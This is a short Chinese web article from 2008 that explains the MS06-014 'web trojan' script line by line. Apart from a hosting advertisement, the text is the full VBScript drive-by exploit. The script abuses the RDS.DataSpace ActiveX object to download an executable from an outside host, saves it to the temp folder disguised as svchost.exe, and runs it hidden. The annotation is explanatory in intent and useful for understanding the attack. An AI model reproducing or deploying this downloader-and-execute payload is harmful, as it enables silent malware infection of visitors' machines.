MS06014网马脚本解释

来源：互联网 作者：west263.com 时间：2008-04-16

西部数码-全国虚拟主机10强！40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

---------------------采用讯驰移动双核技术的分割线-------------------------------------------
　　Set df = document.createElement("object") '创建项目
　　df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" '对项目进行36位全球唯一码编号
　　Set x = df.CreateObject("Microsoft.XMLHTTP,"") '创建一个XMLHTTP项目(用来传输数据)
　　set SS = df.createobject("ADODB.Stream","") '创建一个ADOBD数据流格式(数据媒介)
　　SS.type = 1 '类型.1似乎是2进制.具体忘了
　　x.Open Get, "http://fxfqiao.com/laopo/1.exe", False '打开远程文档,这个就是木马文档了
　　x.Send '发送
　　set F = df.createobject("Scripting.FileSystemObject","") '创建一个文档项目(用来把数据流还原成文档)
　　set tmp = F.GetSpecialFolder(2) '这句似乎是获得文档夹
　　SS.open ''
　　fname1= F.BuildPath(tmp,"svchost.exe") '注入到svchost.exe
　　SS.write x.responseBody '把远程文档写入数据流中
　　SS.savetofile fname1,2 '把数据流存为文档.并且是直接写到svchost.exe的Hook似乎,到这里.您的机器已中毒
　　set Q = df.createobject(Shell.Application,"") '创建一个Shell
　　Q.ShellExecute fname1,"","","open",0 '到这里.您的病毒开始发挥作用
　　------------------------------------------采用讯驰移动双核技术的分割线-------------------------------------------------------